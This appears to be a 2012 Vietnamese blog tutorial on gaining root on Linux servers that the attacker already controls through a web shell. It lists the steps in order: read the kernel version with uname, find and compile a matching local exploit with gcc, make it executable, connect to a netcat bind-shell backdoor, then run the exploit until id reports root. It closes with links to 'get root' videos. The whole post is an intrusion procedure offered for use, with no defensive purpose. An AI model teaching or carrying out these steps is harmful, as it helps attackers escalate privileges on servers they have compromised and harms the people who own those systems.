Thứ Bảy, 7 tháng 7, 2012

TUT Get Root Căn Bản

Công cụ


Code:
Shell
Netcat
Exploit
đầu tiên trong ô run command của shell gỏ
Code:
uname -a
or
Code:
less /proc/version
Nó sẽ hiện ra phiên bản linux
Code:
Linux 2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
Chúng ta search exploit này ,sau đó lưu dưới dạng file.c
run command
Code:
gcc filename.c -o filename
mở hết quyền cho file này
Code:
chmod 777 filename
Bất netcat đã mở cổng và backdoor từ shell
Code:
C:\nc
nc IP port
ex:
Code:
nc 127.0.0.1 7777
or
Code:
nc -vv -l -p 7777
or
Code:
nc -vlp 443
Nếu thành công thì sẽ hiện
Code:
:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
típ tục
id
nó sẽ hiện
Code:
id=99(nobody) gid=99(nobody)
Và bây h dùng exploit getroot
Code:
./file
típ tục
Code:
id
khi nó hiện
Code:
id=root gid=root groups=root
là thành công


1 so video get root
http://wn.com/qinory
http://77.120.120.218/

Không có nhận xét nào: